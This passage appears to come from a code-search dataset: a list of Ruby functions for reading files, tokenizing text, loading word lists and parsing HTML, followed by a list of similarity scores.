"def tokenize(in_name) \n\t\tmulti_line = false\n\t\t@in_file = File.new(in_name, \"r\");\n\t\tout_name = in_name.gsub /.jack$/, \"Tgen.xml\"\n\t\t@out_file = File.new(out_name,\"w\")\n\t\t@out_file.puts \"<tokens>\"\t\t\n\t\tfor i in @in_file #none of these regexes are readable or debugable, never again\n\t\t\ti.gsub! %r!/\\*.*\\*/!, '' #incase a multiline format is only used for a single line after code on same line\n\t\t\tif multi_line\n\t\t\t\t#p \"de #{i}\"\n\t\t\t\tnext unless i.match %r!\\*/!\n\t\t\t\ti.gsub! %r!.*\\*/!, ''\n\t\t\t\tmulti_line = false\n\t\t\tend\n\t\t\t\n\t\t\tif i.match %r!/\\*!\n\t\t\t\t#p \"re #{i}\"\n\t\t\t\ti.gsub! %r!/\\*.*!, ''\n\t\t\t\tmulti_line = true\n\t\t\tend\n\t\t\t\n\t\t\t# hahahahaha %r!! makes finding comments easier because it looks neater and is eaiser to read\n\t\t\ti.gsub! %r!//.*!, ''\n\t\t\ti.gsub! /(\\{|\\}|\\(|\\)|\\[|\\]|\\.|,|;|\\+|-|\\*|\\/|&|\\||<|>|=|~)/, ' \\1 '\n\t\t\t#p i\n\t\t\ti.strip! #ba chica wa wa\n\t\t\ti.scan /\\S+/ do |j|\n\t\t\t\ttype = token_type j\n\t\t\t\tj.gsub! /&/, '&'\n\t\t\t\tj.gsub! /\"/, ''\n\t\t\t\tj.gsub! />/, '>'\n\t\t\t\tj.gsub! /</, '<'\n\t\t\t\twrite_toke type, j\n\t\t\tend\n\t\tend\n\n\t\t@out_file.puts \"</tokens>\"\t\t\n\t\t#SHould always close even if it is done at program's terminations\n\t\t@in_file.close() \n\t\t@out_file.close()\n\tend",
"def wordlist\n # Split defaults to splitting on white space\n File.read(File.expand_path('../data/subdomains.txt', __FILE__)).split\n end",
"def get_stopword_list\n list = []\n \n begin\n File.open(\"stopwords.txt\", \"r\") do |file|\n file.each_line { |line| list.push( line.chomp ) }\n end\n rescue\n puts \"The file 'stopwords.txt' was not found.\"\n exit\n end\n\n return list\nend",
"def prepare_words(filename)\n @words = []\n File.readlines(filename).each do |line|\n line.split.each {|word| @words << word}\n end\n end",
"def index_file(file, pages_dir, stopwords, file_data)\n # Removing the dir from the file name\n # begin\n actual_name = file.gsub(pages_dir, \"\")\n # rescue NoMethodError\n# actual_name = badpage.html\n \n\n # Resetting the file path\n file_path = \"\"\n file_path = File.expand_path(\".\") + \"/\" + file\n\n print \"Parsing HTML document: \" + actual_name + \" \\n\"\n\n # Finding all the tokens in the file\n tokens = find_tokens(file_path)\n\n # Getting the page title, word count, and page url\n page_title = get_title(file_path)\n word_count = tokens.length\n page_url = file_data[actual_name]\n\n # Updating the docindex hash\n $docindex[file.gsub(pages_dir, \"\")] = [word_count, page_title, page_url]\n\n # Removing the stop words and getting the stem words in the file\n tokens = remove_stop_tokens(tokens, stopwords)\n tokens = stem_tokens(tokens)\n\n # Creating the invindex hash table\n for token in tokens\n begin\n if $invindex.member?(token)\n if $invindex[token].member?(actual_name)\n $invindex[token][actual_name] += 1\n else\n $invindex[token][actual_name] = 1\n end\n else\n $invindex[token] = {actual_name => 1}\n end\n # end\n# rescue NoMethodError\n # puts \"NoMethodError\"\n end\n #puts file_name\n # title = nil\n end\n #end\nend",
"def page_content(title)\n File.read(\"pages/words.txt\")\nrescue Errno::ENOENT\n return nil\nend",
"def get_tokens(lines)\n tokens = []\n chunk = \"\"\n\n lines.each do |line|\n case line\n when /^[#\\+\\-]+.*$/ # Headers\n unless chunk == \"\"\n tokens += [chunk.strip]\n chunk = \"\"\n end\n\n tokens += [line.strip]\n when /^\\s*$/ # Ends or Starts of paragraphs\n unless chunk == \"\"\n tokens += [chunk.strip]\n chunk = \"\"\n end\n else #Paragraphs\n chunk += line.strip + \" \"\n end\n end\n\n tokens += [chunk.strip] unless chunk == \"\"\n tokens\nend",
"def ReadFromFile()\n wordArray = Array.new\n File.open(\"mastermindWordList.txt\", \"r\") do |file| # Uncomment this to have a larger list (466000+ words)\n # Note: Only use if in original repository that contains words.txt\n # File.open(\"mastermindWordList.txt\", \"r\") do |file| # Comment this if previous line is uncommented\n file.each_line do |word|\n if CheckValidWord(word) == true\n wordArray.push(word.chomp.downcase)\n end\n end\n end\n return wordArray\nend",
"def parse_kramdown(file)\n ::Kramdown::Document.new File.readlines(file).join, :input => 'QuickStartParser' \n end",
"def words\n @content.split\n end",
"def words\n @content.split\n end",
"def list\n\t\tfiles.map! { |filename|\n\t\t\t{:title => file_to_pagename(filename), :link => filename.chomp(\".md\")}\n\t\t}\n\tend",
"def list\n\t\tfiles.map! { |filename|\n\t\t\t{:title => file_to_pagename(filename), :link => filename.chomp(\".md\")}\n\t\t}\n\tend",
"def get_spelling_words(file)\n lines = IO.readlines(file).map(&:chomp)\n review_word = false\n challenge_word = false\n words = []\n lines.each do |line|\n if md=line.match(/\\A(\\d+)\\.\\s+(\\w+)\\Z/)\n (num, word) = md.captures\n words << SpellingWord.new(num, word, review_word, challenge_word)\n elsif line.match(/\\AReview Words/)\n review_word = true\n challenge_word = false\n elsif line.match(/\\AChallenge Words/)\n challenge_word = true\n review_word = false\n end\n end\n words\nend",
"def loadLocalHtml \n details = []\n Dir.glob('./htmls/*') do |file|\n tableTr = getTableFromLocalHtml(file)\n puts file\n detail = getTableCells(tableTr, File.basename(file).sub(\".html\",\"\"))\n details += detail\n end\n generateCSV(details)\nend",
"def load_list filename\n\tlist = []\n\tbegin\n\t\topen filename do |f|\n\t\t\tuntil (line = f.gets).nil?\n\t\t\t\tnext if line.strip.empty?\n\t\t\t\tlist << line.strip\n\t\t\tend\n\t\tend\n\trescue Errno::ENOENT\n\tend\n\tlist\nend",
"def get_list_file(url)\n\t\tdownload_html_file(url)\n\t\tdoc = Nokogiri::HTML(File.new(@tmp_html))\n\n\t\tlist = []\n\t\t# Parsing each link to find the relevant one\n\t\tdoc.css('a[@href!=\"../\"]').each do |link|\n\t\t\tlist << {\n\t\t\t\t'name' => link.text,\n\t\t\t\t'url' => link['href']\n\t\t\t}\n\t\tend\n\t\treturn list\n\tend",
"def word_count_a_file(file_path)\n File.read(file_path).split(' ').length\n # had to create the file, text taken from https://www.lipsum.com/feed/html\nend",
"def searchable_content(file)\n content = File.read file\n content = CommonMarker.render_html content\n content.remove(/<\\/?[^>]*>/).gsub(\"\\n\", \" \")\n end",
"def generate_words\n ret = []\n\n File.open('enable.txt').each do |line|\n new_line = line\n # We don't care for the new line character in the game of hangman.\n new_line = new_line.delete(\"\\n\")\n ret << new_line\n end\n\n return ret\nend",
"def html(name)\n File.open(File.join(File.dirname(__FILE__), \"fixtures\", \"htmls\", \"#{name}\")).read\n end",
"def get_file_contents(file_path)\n input_file = File.open(file_path, 'r')\n input_file_contents = input_file.read\n input_file.close\n input_file_contents.split(\"\\n\")\n end",
"def list\n file_correct?(@file_path)\n file = File.open(@file_path)\n file.map { |row| row.split(' ') }\n end",
"def read_words(dictionary)\n unless FileTest.file?(dictionary)\n p \"Provided #{dictionary} is not a filepath or such file doesn't exist.\"\n return []\n end\n\n words = []\n IO.foreach(dictionary) { |line| words << line.strip }\n words\n end",
"def get_content(file_path)\n puts \"getting markdown for: #{file_path}.md\\n\\n\"\n file = File.open(\"data/pages/#{file_path}.md\", \"r\")\n return file.read\nend",
"def tokens\n @tokens ||= texts.map do |value|\n GoogleTranslateDiff::Tokenizer.tokenize(value)\n end\n end",
"def next_page\n @page_content = []\n pagefile = File.open(@pagefilename, \"r\")\n while (l = pagefile.gets)\n @page_content << l\n end\n \n @nextpagenum += 1\n @pagefilename = @pagefile_prefix + @nextpagenum.to_s + \".txt\"\n \n return @page_content \n end",
"def add_words_from_text_file(file_path)\n words = []\n\n File.open(file_path, 'r') do |file|\n file.each do |line|\n words.push(line.chomp)\n end\n end\n\n add_words(words)\n end",
"def parse_file(f)\n\tentities = []\n\twhile (e = parse_entity(f))\n\t\tentities.push(e)\n\tend\n\treturn entities\nend",
"def analyse(file_path)\n fixed = 0\n words = []\n File.open(file_path, \"r:iso-8859-1\") do |f|\n words = f.readlines(sep=\" \")\n words.dup.each_with_index do |word, i|\n word.delete!(\" \")\n match, dist = @tree.best word.downcase\n if !match.nil? && dist != 0\n fixed+=1\n words[i] = capitalize_if_needed(word, match)\n # puts \"#{word} - #{match}\"\n end\n end\n end\n # print \"file: #{file_path}\\nwords: #{words.size}\\nfixed words:#{((fixed.to_f/(words.size).to_f)*100).round(2)}%\\n\"\n save words, file_path\n end",
"def file_load(file)\n\t\tresult = \"\"\n\t\tFile.open(file.to_s, 'r') do |f|\n\t\t\twhile l = f.gets \n\t\t\t\tresult << l\n\t\t\tend\n\t\tend\n\t\tresult\n\tend",
"def tokenizer(aTextToParse)\n scanner = StringScanner.new(aTextToParse)\n tokens = []\n\n loop do\n scanner.skip(/\\s+/)\n curr_pos = scanner.pos\n word = scanner.scan(/\\S+/)\n break unless word\n\n term_name = Lexicon[word]\n raise StandardError, \"Word '#{word}' not found in lexicon\" if term_name.nil?\n\n pos = Rley::Lexical::Position.new(1, curr_pos + 1)\n tokens << Rley::Lexical::Token.new(word, term_name, pos)\n end\n\n return tokens\nend",
"def extract_all_words(html)\n doc = Nokogiri::HTML(html)\n keywords = []\n doc.css(\"meta[name='keywords']\").each do |node|\n keywords += node['content'].gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ',]/, '').squeeze(\" \").split(\",\")\n end\n text = String.new\n doc.css(\"meta[name='description']\").each do |node|\n text += node['content']\n end\n \n %w(script style link meta).each do |tag|\n doc.css(tag).each { |node| node.remove }\n end\n\n w = []\n doc.traverse do |node|\n if node.text? then\n w << node.content + \" \"\n end\n end\n text += w.join.gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ']/, '').squeeze(\" \")\n words = (text.downcase.split - STOPWORDS)\n \n final = (keywords + words)\n final.map do |w|\n w.stem\n end\n end",
"def words_from_file(text_file)\n File.read(text_file).downcase.gsub(/[^a-z]/, \" \").split\nrescue\n puts \"Please provide the following file: #{text_file}\"\n exit\nend",
"def symbols(file); end",
"def symbols(file); end",
"def read_text(filename); end",
"def parse_html_files\n Find.find(Dir.getwd) do |file|\n if !File.directory? file and File.extname(file) == '.html'\n # exclude and skip if in a bad directory\n # we may be on an html file, but some we just do not want\n current = File.new(file).path\n\n # skip these folders entirely\n if current.match(/(blog|old|draft|archive|font)/i)\n next\n end\n\n # open file, pluck content out by its element(s)\n page = Nokogiri::HTML(open(file));\n\n # grab title\n title = page.css('title').text.to_s;\n title = strip_bad_chars(title)\n\n # for page title, destroy any pipes and MS pipes and return the first match\n title.sub!('Velir | ', '')\n\n # Grab hero title and tagline\n hero = page.css('article.type-centered h2').text\n hero_tagline = page.css('article.type-centered .type-hero').text\n\n # grab the body content\n body = page.css('.outer-wrapper .row .columns').to_html\n body = clean_body(body)\n\n # clean the file path\n path = File.new(file).path\n path.gsub! $base_path, \"/\"\n\n # if we have content, add this as a page to our page array\n if (body.length > 0)\n $count += 1\n puts \"Processing \" + title\n\n # insert into array\n data = {\n 'title' => title,\n 'path' => path,\n 'hero' => hero,\n 'hero_tagline' => hero_tagline,\n 'body' => body,\n }\n\n $pages.push data\n end\n end\n end\n\n write_csv($pages)\n report($count)\nend",
"def read_file(path)\n lines = []\n count = 0\n vocab = Set.new\n File.open(path, \"r:ISO-8859-1\").each do |line|\n line = line.strip\n vocab.merge(parse_vocab(line))\n lines << line\n count += 1\n end\n return lines, vocab\nend",
"def process_content(path)\n case path.extname\n when '.htm', '.md'\n read_split_content(path.to_s, symbolize_keys: true)\n # when '.md'\n # body, data = read_split_content(path.to_s, symbolize_keys: true)\n # [Kramdown::Document.new(body).to_html, data]\n when '.yml'\n [nil, YAML.load(File.read(path.to_s), symbolize_names: true)]\n end\n end",
"def getFileContent(dir, file):Array\n arr = Array.new\n File.open(\"#{dir}/#{file}\", \"r\").each do |line|\n arr.push line\n end\n arr\n end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def read_source\n source = []\n File.open($source_file, \"r\") do |file|\n doc = REXML::Document.new(file)\n doc.root.elements.each do |element|\n source << [element.name.strip, element.text.strip]\n end\n end\n return source\nend",
"def get_name_feature_from_file(content)\n parser = Gherkin::Parser.new\n gherkin_document = parser.parse(content)\n gherkin_document[:feature][:name]\nend",
"def parse_tree\n File.open(html_file, 'r') do |file|\n current = nil\n file.each_line do |line|\n line.scan(%r{(<(.*?>.*?)<(\\/.*?)>|<(.*?)>(.*))}).each do |tag|\n if !tag[3].nil? && tag[3].start_with?('/') # ending tag\n current = current.parent\n else\n node = Node.new(tag)\n if @root.nil?\n @root = node\n else\n node.parent = current\n current.childs << node\n end\n @tags << node.tag\n current = node\n current = current.parent if !tag[2].nil? && tag[2].start_with?('/')\n end\n end\n end\n end\n end",
"def load_file_contents(filename)\n File.open(filename).readlines\n end",
"def word_list\n @word_list ||= Set.new File.read(\"dictionary.txt\").split(\"\\n\").map(&:downcase)\n end",
"def getNames()\n\t#open file\n\tf = File.open(\"names.txt\", \"r\")\n\t#initialize namear array\n\tnamear = []\n\tf.each_line do |line|\n\t\t#remove '\"' and line escapes\n\t\tline = line.gsub(/\"/,'').strip\n\t\t#split the line into individual names separating at ','\n\t\tnamear = line.split(',')\n\tend\n\t#close file\n\tf.close\n\t#return array\n\treturn namear\nend",
"def get_tokens\n\t\treturn @tokens\n\tend",
"def tokenize; end",
"def tokenize; end",
"def tokens\n @tokens ||= scanner.tokenize(input)\n end",
"def index(file) \n\n file = File.open(file, \"r\")\n tasks = file.readlines\n file.close\n\n return tasks\n\nend",
"def markup_file_contents(contents); end",
"def get_info(w)\n\trequire 'open-uri'\n\tparagraph = []\n\tcontents = open('http://en.wikipedia.org/wiki/' + w) {|f| \n\t\tf.readlines.each {|x| \n\t\t\tif x =~ /<p>(.*)<\\/p>/\n\t\t\tparagraph.push($1)\n\t\t\tend\n\t}}\n\n\t# If a file name was passed in to be stored somewhere\n\t# Otherwise, Temp.doc will be created and modified\n\tif(ARGV[0] != nil)\n\t\tfile = File.open(ARGV[0], 'a')\n\telse\n\t\tfile = File.open(\"Temp.doc\", 'a')\n\tend\n\n\t# Writes to file what is being searched for\n\tfile.write(w.upcase + \":\\n\")\n\n\t# Uses regular expression to grab first two paragraph\n\tparagraph.each {|p| paragraph(p,file)}\n\t\n\tfile.write(\"\\n\")\n\tfile.close\nend",
"def tokens\n return @tokens\n end",
"def read_search_term_file(file_name)\n file = File.open \"jobs/twitter_resources/#{file_name}.json\"\n data = JSON.load file\n file.close\n return data[\"search_terms\"]\nend",
"def textualed\n list = File.readlines(file_name)\n full_list = list.sort_by { |x| x.downcase }\n while a = full_list.shift\n puts a unless nil? \n end\n end",
"def content_tags(name)\n array = []\n name_li(name).div(:class=>/(mylibrary_item_|searchcontent_result_)tags/).lis.each do |li|\n array << li.span(:class=>\"s3d-search-result-tag\").text\n end\n return array\n end",
"def read()\n a=[]\n f=open(\"words.txt\")\n f.each_line {|line|\n a[a.length]=line.chomp}\n f.close\n return a\nend",
"def tokens\n self.entries\n end",
"def parse_file\n @file ||= File.open(@file_name) unless @file_name.nil?\n @text = @file.readlines\n @file.close unless @file.nil?\n parse_text\n end",
"def read_src name\n IO.readlines('../src/' + name).collect{|c| \"\\t\" + c}\nend",
"def get_keywords( descriptions )\n keywords = []\n descriptions.each do |description|\n page_text = Nokogiri::HTML(description).text\n keywords.concat( page_text.split(/\\W+/) )\n end\n\n return keywords\nend",
"def tokenize ; end",
"def tokenize ; end",
"def read_trees(filename)\n log(\"Reading #{filename}...\")\n File.open(filename, \"r\") do |file|\n file.readlines.collect do |line|\n Tree.from_string(line)\n end\n end\nend",
"def unixWords(inputFile)\n\t\ttext = File.open(inputFile).read\n\t\twords = []\n\t\ttext.each_line do |line|\n\t\t\twords.push(line.gsub(\"\\n\",\"\"))\n\t\tend\n\t\treturn words\n\tend"
] | [
"0.68459404",
"0.6549772",
"0.63205284",
"0.61659604",
"0.6140782",
"0.611115",
"0.593393",
"0.59052026",
"0.5876549",
"0.5870015",
"0.581922",
"0.58115005",
"0.5761115",
"0.57432467",
"0.5727498",
"0.5725638",
"0.56991166",
"0.56788445",
"0.5674697",
"0.5656922",
"0.565593",
"0.5637923",
"0.5632416",
"0.5631721",
"0.55878735",
"0.5579333",
"0.55770874",
"0.55567163",
"0.5546229",
"0.5529622",
"0.55210114",
"0.54902494",
"0.5486387",
"0.5484035",
"0.54530835",
"0.54530835",
"0.54396194",
"0.54396194",
"0.543692",
"0.5431886",
"0.54246944",
"0.5419155",
"0.5417948",
"0.54168373",
"0.5404135",
"0.5402938",
"0.5381219",
"0.53732276",
"0.5364677",
"0.5360528",
"0.5360178",
"0.53417593",
"0.5330434",
"0.5329718",
"0.5311754",
"0.5308575",
"0.5281061",
"0.5280217",
"0.52710533",
"0.5266825",
"0.5266825",
"0.5263649",
"0.5230419",
"0.5224857",
"0.5220612",
"0.52133673",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5193335",
"0.51914203",
"0.5188258",
"0.5175904",
"0.5166123",
"0.5157334",
"0.51547986",
"0.51458514",
"0.51458514",
"0.51438326",
"0.51387775",
"0.5137",
"0.5133898",
"0.51327807",
"0.51279736",
"0.5127503",
"0.51266503",
"0.51233643",
"0.51217175",
"0.51167816",
"0.51158714",
"0.51135784",
"0.5110327",
"0.5110327",
"0.5106666",
"0.51052725"
] | 0.7772613 | 0 |
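The `find_tokens` document above calls a `parse_html` helper that is not included in this row; a minimal sketch of what such a helper might look like, assuming Nokogiri is available (an illustration, not the dataset's actual implementation):

```ruby
require 'nokogiri'

# Hypothetical helper assumed by find_tokens above: parses an HTML string
# and returns its visible text so remove_punc can tokenize it.
def parse_html(html)
  Nokogiri::HTML(html).text
end
```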
function that takes a list of tokens, and a list (or hash) of stop words, and returns a new list with all of the stop words removed | def remove_stop_tokens(tokens, stop_words)
  filtered = []

  # Looping through the tokens and keeping only the non-stop words.
  # (Calling tokens.delete inside a `for token in tokens` loop would mutate
  # the list while iterating over it, skipping elements and returning the
  # same list rather than a new one.)
  for token in tokens
    filtered.push(token) unless stop_words.member?(token)
  end

  return filtered
end | {
  "objective": {
    "self": [],
    "paired": [],
    "triplet": [
      [
        "query",
        "document",
        "negatives"
      ]
    ]
  }
} | [
"def remove_stop_words(list)\n list.select {|word| word unless @stopwords.include? word }\n end",
"def remove_stop_words(list)\n if @filter_stop_words\n list.select {|word| !@stopwords.include?(word) }\n else\n list\n end\n end",
"def removeBlackList words\n\t\tblacklist = ['a','an','the','then','but','therefore','because','I','he',\n\t\t\t\t\t 'she','it','him','her','his','her','its','they','them','their']\n\t\tblacklist.map!{|w| w.upcase}\n\t\tmodified = words.clone\n\t\tmodified.delete_if{|w| blacklist.include?(w.upcase)}\n\t\treturn modified\n\tend",
"def remove_stopwords(ary)\n @filter.filter(ary)\n end",
"def xfrm_remove_stop_words(str)\n stop_words = ['Variant','variant', 'Erhua', 'Counter', 'Has', 'I', 'me', 'a', 'an', 'am', 'are', 'as', 'at', 'be', 'by','how', 'in', 'is', 'it', 'of', 'on', 'or', 'that', 'than', 'the', 'this', 'to', 'was', 'what', 'when', 'where', 'who', 'will', 'with', 'the']\n results = []\n str.gsub!($regexes[:inlined_tags], \"\") ## remove tag blocks\n str.split(' ').each do |sstr|\n # remove non word characters from string\n results << sstr unless stop_words.index(sstr.gsub(/[^a-zA-Z|\\s]/, '').strip)\n end\n return results.flatten.compact.join(' ')\n end",
"def remove_stop_words(question, vectorStopWords)\n vectorStopWords.each do |stopWord|\n if question.match(/\\b#{stopWord}\\b/)\n question.gsub! (/\\b#{stopWord}\\b/), ''\n end\n end\n question\n end",
"def tokenize(s)\nterms = s.gsub(/(\\s|\\d|\\W)+/u,' ').rstrip.strip.downcase.split(' ')\nterms.reject!{|term| @@stop_words.include?(term) || term.length < 3}\nterms\nend",
"def filter_term_list(term_list)\n (term_list.map(&:downcase) - IGNORED_WORDS).reject { |t| t.size < 3 }\n end",
"def remove_stop_words\n f = File.open('/Users/ravil/experimental/exips/stop_words.txt')\n $stack.push(f.read.split(','))\n f.close\n # add single letter words\n $stack[-1] += 'abcdefghijklmnopqrstuvwxyz'.chars # Python's list(string.ascii_lowercase)\n $heap[:stop_words] = $stack.pop\n $heap[:words] = []\n while $stack.length > 0\n if $heap[:stop_words].include? $stack.last\n $stack.pop\n else\n $heap[:words].append $stack.pop # pop it, store it\n end\n end\n $stack += $heap[:words] # Load the words onto the stack\n $heap[:stop_words] = nil; $heap[:words] = nil # Not needed\nend",
"def process_stopwords(txt = self.search_text)\n #Needs to be set so highlighting will work properly (can't match quotes)\n self.highlight_token_array(txt)\n #Now put humpty dumpty back together without the nasty stopwords, sort the tokens by length\n self.search_token_array(txt).join(\" \")\n end",
"def filter phrase\n\t\twords = phrase.reject{ |word| stopwords_list.include? word }\n\t\twords.reject{ |word| invalid_word? word}\n\tend",
"def stop_on *words\n @stop_words = [*words].flatten\n end",
"def array_with_stopwords(txt)\n qa = self.query_wo_exact_phrases(txt).split\n qa.delete(',') #delete works on self (qa here), so won't work chained onto the statement above!\n qa\n end",
"def strip_stopwords!(stopwords, min_length)\n @body = @body.split.delete_if() do |x| \n t = x.downcase.gsub(/[^a-z]/, '')\n t.length < min_length || stopwords.include?(t)\n end.join(' ')\n end",
"def remove_words(text, removes)\n\twords = text.split(\" \")\n\n\twords_to_remove = []\n\n\tremoves.split(\" \").each do |item|\n\t\twords_to_remove << item\n\tend\n\n\treturn_text = \"\"\n\n\twords.each do |word|\n\t\treturn_text += \"#{word} \" unless words_to_remove.include?(word)\n\tend\n\n\treturn return_text\nend",
"def strip_stopwords!(stopwords, min_length)\n #noinspection RubyParenthesesAfterMethodCallInspection\n @body = @body.split.delete_if() do |x|\n t = x.downcase.gsub(/[^a-z]/, '')\n t.length < min_length || stopwords.include?(t)\n end.join(' ')\n end",
"def apply(terms)\n terms.reject{|t| @black_list.include?(t.to_ruby) }\n end",
"def delete_endings(words)\n without_endings = []\n words.each do |word|\n without_endings << delete_ending(word)\n end\n\n without_endings\n end",
"def clean_array( keywords )\n keywords.map!{|keyword| keyword.downcase.strip}\n blacklist = %w{ 000 do we from as other like working web data and 00 to you your our on in the of for ru }\n\n keywords.each do |keyword|\n keywords.delete( keyword ) if keyword.empty?\n end\n\n keywords.each do |keyword|\n keywords.delete( keyword ) if keyword.numeric?\n end\n\n keywords.each do |keyword|\n ('a'..'z').to_a.each do |letter|\n keywords.delete( keyword ) if letter == keyword\n end\n end\n\n keywords.each do |keyword|\n blacklist.each do |badword|\n keywords.delete( keyword ) if keyword == badword\n end\n end\n\n keywords.each do |k|\n if k == \"12\"\n ap 'bingo=======================================' if k.numeric?\n end\n end\n\n return keywords \nend",
"def strip_to_stems\n str = self.sanitize_tags\n terms_a = str.gsub(/[^a-z]+/u, ' ').strip.split(' ')\n terms = terms_a.reject do |term|\n ((term.length < 3 && !SHORT_WORDS.include?(term)) || term.length > 20)\n end\n terms.collect! {|term| term.stem}\n terms = terms.select {|term| term.length > 1}\n terms = terms - STOP_STEMS\n return terms.join(' ')\n end",
"def stopwords\n @stopwords ||= @stopword_generator.to_set\n end",
"def custom_stopwords(stopwords)\n unless stopwords.is_a?(Enumerable)\n if stopwords.strip.empty?\n stopwords = []\n elsif File.exist?(stopwords)\n stopwords = File.read(stopwords).force_encoding(\"utf-8\").split\n else\n return # Do not overwrite the default\n end\n end\n Hasher::STOPWORDS[@language] = Set.new stopwords\n end",
"def all_excluded_words\n (excluded_words + (lazy? ? LAZY_WORDS : [])).map(&:downcase)\n end",
"def del_let_words(current)\n output = []\n (0..(current.length-1)).each do |index|\n test_word = current.clone\n test_word[index] = \"\"\n output << test_word if legal_word?(test_word)\n end\n output\nend",
"def stem_tokens(tokens)\n stem_list = []\n\n # Looping through the list and finding the stem word for each word\n for word in tokens\n word = word[/\\w*/]\n s = word.stem\n stem_list.push(s)\n end\n\n return stem_list\nend",
"def remove_w_words(sentence)\r\n\r\n arr = [] # empty array created\r\n x = sentence.split(\" \")\r\n\r\n i = 0\r\n while i < x.length # iteration starts to check \"w\" in each word\r\n arr << x[i] if x[i][0] != \"w\" # words w/o \"w\" collected\r\n i += 1\r\n end\r\n\r\n arr.join(\" \") # result\r\nend",
"def remove_tags!(*list)\n removed = []\n tags.reject! { |tag| list.include?(tag) ? removed.push(tag) : false }\n removed\n end",
"def without_words_not_contributing_to_letter_set(words, new_word)\n words_that_intersect_with_new_word = []\n words.each do |word|\n if letter_set_from_words(word).intersect?(letter_set_from_words(new_word))\n words_that_intersect_with_new_word << word\n end\n end\n\n words_that_intersect_with_new_word.each do |word|\n if letter_set_from_words(words.reject { |w| w == word } + [new_word]) >= letter_set_from_words(word)\n words.delete(word)\n end\n end\nend",
"def exclusion_words(word_list)\n\t# get a subset of words to exclude based on the unique list\n\tuniq_words = word_list.uniq\n\n\t# check there is more than 1 unique word\n\tif uniq_words.length==1\n\t\texclude = []\n\telse\n\t\tmax_exclude = uniq_words.length-1\n\t\texclude_count = rand(1..max_exclude)\n\t\texclude = uniq_words.sample(exclude_count)\n\tend\n\treturn exclude\nend",
"def get_words(str)\n stopwords = stopwords()\n \n str = str.downcase\n str = strip_parenthesis(str)\n str.strip!\n str.gsub!(\"'\", ' ')\n str.gsub!('\"', ' ')\n str.gsub!('.', ' ')\n str.gsub!(',', ' ')\n str.gsub!(':', ' ')\n str.gsub!('/', ' ')\n str.gsub!('!', ' ')\n str.gsub!('?', ' ')\n str.gsub!(';', ' ')\n str.gsub!('<', ' ')\n str.gsub!('>', ' ')\n str.gsub!('-', ' ')\n str.gsub!('$', ' ')\n str.gsub!(/( )+/, ' ')\n str_arr = str.split(' ')\n out_arr = []\n \n for word in str_arr\n if(word.length > 3 and out_arr.index(word) == nil and stopwords.index(word) == nil)\n out_arr << word\n end\n end\n \n out = out_arr.join(' ')\n \n return out\n end",
"def deletions\n new_words = []\n @words.each do |word|\n @word = word || ''\n new_words += (0..length).map { |i| \"#{@word[0...i]}#{@word[i+1..-1]}\" }\n end\n new_words\n end",
"def stop_words\n # Words taken from Jonathan Feinberg's cue.language (via jasondavies.com), see lib/cue.language/license.txt.\n \"i|me|my|myself|we|us|our|ours|ourselves|you|your|yours|yourself|yourselves|he|him|his|himself|she|her|hers|herself|it|its|itself|they|them|their|theirs|themselves|what|which|who|whom|whose|this|that|these|those|am|is|are|was|were|be|been|being|have|has|had|having|do|does|did|doing|will|would|should|can|could|ought|im|youre|hes|shes|its|were|theyre|ive|youve|weve|theyve|id|youd|hed|shed|wed|theyd|ill|youll|hell|shell|well|theyll|isnt|arent|wasnt|werent|hasnt|havent|hadnt|doesnt|dont|didnt|wont|wouldnt|shant|shouldnt|cant|cannot|couldnt|mustnt|lets|thats|whos|whats|heres|theres|whens|wheres|whys|hows|a|an|the|and|but|if|or|because|as|until|while|of|at|by|for|with|about|against|between|into|through|during|before|after|above|below|to|from|up|upon|down|in|out|on|off|over|under|again|further|then|once|here|there|when|where|why|how|all|any|both|each|few|more|most|other|some|such|no|nor|not|only|own|same|so|than|too|very|say|says|said|shall\"\nend",
"def filter(keywords)\n keywords.delete_if do |key, value|\n include?(key.downcase)\n end\n end",
"def get_stop_word_array\n\t\treturn ['a','about','above','after','again','against','all','am','an','and','any','are',\"aren't\",'as','at','be','because','been','before','being','below','between','both','but','by',\n\t\t\t\t\"can't\",'cannot','could',\"couldn't\",'did',\"didn't\",'do','does',\"doesn't\",'doing',\"don't\",'down','during','each','few','for','from','further','had',\"hadn't\",'has',\"hasn't\",\n\t\t\t\t'have',\"haven't\",'having','he',\"he'd\",\"he'll\",\"he's\",'her','here',\"here's\",'hers','herself','him','himself','his','how',\"how's\",'i',\"i'd\",\"i'll\",\"i'm\",\"i've\",'if','in','into',\n\t\t\t\t'is',\"isn't\",'it',\"it's\",'its','itself',\"let's\",'me','more','most',\"mustn't\",'my','myself','no','nor','not','of','off','on','once','only','or','other','ought','our','ours',\n\t\t\t\t'ourselves','out','over','own','same',\"shan't\",'she',\"she'd\",\"she'll\",\"she's\",'should',\"shouldn't\",'so','some','such','than','that',\"that's\",'the','their','theirs','them',\n\t\t\t\t'themselves','then','there',\"there's\",'these','they',\"they'd\",\"they'll\",\"they're\",\"they've\",'this','those','through','to','too','under','until','up','very','was',\"wasn't\",\n\t\t\t\t'we',\"we'd\",\"we'll\",\"we're\",\"we've\",'were',\"weren't\",'what',\"what's\",'when',\"when's\",'where',\"where's\",'which','while','who',\"who's\",'whom','why',\"why's\",'with',\"won't\",\n\t\t\t\t'would',\"wouldn't\",'you',\"you'd\",\"you'll\",\"you're\",\"you've\",'your','yours','yourself','yourselves','zero']\n\tend",
"def remove_stop_words(song)\n\ttitle = song\n\ttitle.gsub!(/\\b(a|an|and|by|for|from|in|of|on|out|the|to|with)\\b+/, \"\")\n\treturn title\nend",
"def get_word_list\n @word_list = @lines.reject do |line|\n line.length < 5 || line.length > 12\n end\n end",
"def cleanupStopWords(line)\n\t#removes a, an, and, by, for, from, in, of, on, or, out, the, to, with from line\n\t\tline.gsub!(/\\ba+\\b|\\ban+\\b|\\band+\\b|\\bby+\\b|\\bfor+\\b|\\bfrom+\\b|\\bin+\\b|\\bof+\\b|\\bon+\\b|\\bor+\\b|\\bout+\\b|\\bthe+\\b|\\bto+\\b|\\bwith+\\b/, '')\n\treturn line\nend",
"def stopwords\n @stopwords ||= IO.readlines(@stopwords_file).map { |l| l.strip }\n end",
